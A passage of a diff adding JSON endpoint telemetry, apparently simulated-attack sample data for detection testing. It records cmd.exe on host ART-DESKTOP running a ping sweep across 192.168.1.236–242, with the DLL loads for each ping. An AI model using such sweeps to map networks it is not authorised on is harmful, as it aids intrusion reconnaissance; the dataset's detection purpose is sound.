"process", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.236", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6364, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573147029984, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "process", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573151830000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.237", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2912, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "process", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573156990000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.238", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2788, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573157130000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "process", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573161830000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.239", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1344, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573161970000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161830000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "process", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573166990000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.240", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3552, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573167210000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167300000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167300000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "process", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573171830000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.241", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3152, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "process", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573176830000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.242", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6756, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": 